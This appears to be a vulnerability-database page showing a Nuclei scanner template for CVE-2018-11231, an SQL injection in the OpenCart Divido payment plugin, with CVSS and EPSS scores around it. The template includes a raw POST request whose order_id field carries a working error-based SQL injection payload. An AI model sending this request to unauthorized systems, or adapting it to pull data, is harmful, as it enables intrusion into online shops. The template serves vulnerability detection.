Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-11231
HistoryMay 03, 2022 - 8:08 p.m.

Opencart Divido - Sql Injection

2022-05-0320:08:00
ProjectDiscovery
github.com
5
opencart divido sqli sql injection data theft unauthorized access patch upgrade fix

CVSS2

6.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

CVSS3

8.1

Attack Vector

NETWORK

Attack Complexity

HIGH

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS

0.018

Percentile

88.2%

OpenCart Divido plugin is susceptible to SQL injection
id: CVE-2018-11231

info:
  name: Opencart Divido - Sql Injection
  author: ritikchaddha
  severity: high
  description: |
    OpenCart Divido plugin is susceptible to SQL injection
  impact: |
    This vulnerability can lead to data theft, unauthorized access, and potential compromise of the entire Opencart Divido system.
  remediation: |
    Apply the official patch or upgrade to a version that includes the fix.
  reference:
    - https://web.archive.org/web/20220331072310/http://foreversong.cn/archives/1183
    - https://nvd.nist.gov/vuln/detail/CVE-2018-11231
    - http://foreversong.cn/archives/1183
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2018-11231
    cwe-id: CWE-89
    epss-score: 0.00903
    epss-percentile: 0.82368
    cpe: cpe:2.3:a:divido:divido:-:*:*:*:*:opencart:*:*
  metadata:
    max-request: 1
    vendor: divido
    product: divido
    framework: opencart
  tags: cve,cve2018,opencart,sqli,intrusive,divido
variables:
  num: "999999999"

http:
  - raw:
      - |
        POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1
        Host: {{Hostname}}

        {"metadata":{"order_id":"1 and updatexml(1,concat(0x7e,(SELECT md5({{num}})),0x7e),1)"},"status":2}

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{md5({{num}})}}"

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210094fdc034027036f675331a436c8d9717e75ce79fc7a19d05b65af74381436044022100f81d99821fdfe5caea01c0c541569fd07dd78ac1522bbf7146f0a3b802ac09e8:922c64590222798bb761d5b6d8e72950

CVSS2

6.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

CVSS3

8.1

Attack Vector

NETWORK

Attack Complexity

HIGH

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS

0.018

Percentile

88.2%

Related for NUCLEI:CVE-2018-11231